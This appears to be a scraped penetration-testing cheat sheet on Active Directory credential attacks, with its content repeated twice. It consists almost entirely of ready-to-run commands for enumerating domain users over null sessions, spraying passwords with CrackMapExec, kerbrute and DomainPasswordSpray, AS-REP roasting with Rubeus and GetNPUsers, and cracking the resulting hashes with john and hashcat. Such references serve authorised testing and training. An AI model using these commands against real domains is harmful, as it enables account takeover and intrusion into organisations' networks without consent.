With Username

Get the password policy

You need credentials for getting the password policy, but you should get the policy before starting a password spraying

cme <ip> -u "user" -p "password" --pass-pol

rpcclient -U "" -N IP

rpcclient $> getdompwinfo

ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

import-module .\PowerView.ps1
Get-DomainPolicy

enum4linux -U 172.16.5.5  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"

rpcclient -U "" -N 172.16.5.5

cme smb 172.16.5.5 --users

sudo cme smb 172.16.5.5 -u user -p password --users

ldapsearch -h 172.16.5.5 -x -b "DC=domain,DC=LOCAL" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "

./windapsearch.py --dc-ip IP -u "" -U

kerbrute userenum -d domain --dc IP wordlist.txt

sudo cme smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

kerbrute passwordspray -d domain --dc DCIP valid_users.txt Password

sprayhound -U <users.txt> -d <domain> -dc <dc-ip>

for u in $(cat valid_users.txt);do rpcclient -U "$u%<password>" -c "getusername;quit" <dc-ip>| grep Authority; done

Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Password -OutFile spray_success -ErrorAction SilentlyContinue

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

Get-DomainUser -PreauthNotRequired -Properties SamAccountName

.\Rubeus.exe asreproast /user:username /format:hashcat /outfile:hash.txt

GetNPUsers.py domain/username -dc-ip <ip>-request

GetNPUsers.py domain/ -usersfile users.txt -dc-ip <ip> -format hashcat -request

.\john.exe hash.txt --format=krb5asrep -wordlist=wordlist

hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt

If we found a hash and we want to crack them:

Last updated 4 months ago

Get the password policy

You need credentials for getting the password policy, but you should get the policy before starting a password spraying

cme <ip> -u "user" -p "password" --pass-pol

rpcclient -U "" -N IP

rpcclient $> getdompwinfo

ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

import-module .\PowerView.ps1
Get-DomainPolicy

Making a Target User List

enum4linux -U 172.16.5.5  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"

rpcclient -U "" -N 172.16.5.5

cme smb 172.16.5.5 --users

sudo cme smb 172.16.5.5 -u user -p password --users

ldapsearch -h 172.16.5.5 -x -b "DC=domain,DC=LOCAL" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "

./windapsearch.py --dc-ip IP -u "" -U

kerbrute userenum -d domain --dc IP wordlist.txt

Password Spraying

sudo cme smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

kerbrute passwordspray -d domain --dc DCIP valid_users.txt Password

sprayhound -U <users.txt> -d <domain> -dc <dc-ip>

for u in $(cat valid_users.txt);do rpcclient -U "$u%<password>" -c "getusername;quit" <dc-ip>| grep Authority; done

Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Password -OutFile spray_success -ErrorAction SilentlyContinue

ASREPRoast

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

Get-DomainUser -PreauthNotRequired -Properties SamAccountName

.\Rubeus.exe asreproast /user:username /format:hashcat /outfile:hash.txt

GetNPUsers.py domain/username -dc-ip <ip>-request

GetNPUsers.py domain/ -usersfile users.txt -dc-ip <ip> -format hashcat -request

.\john.exe hash.txt --format=krb5asrep -wordlist=wordlist

hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt

If we found a hash and we want to crack them: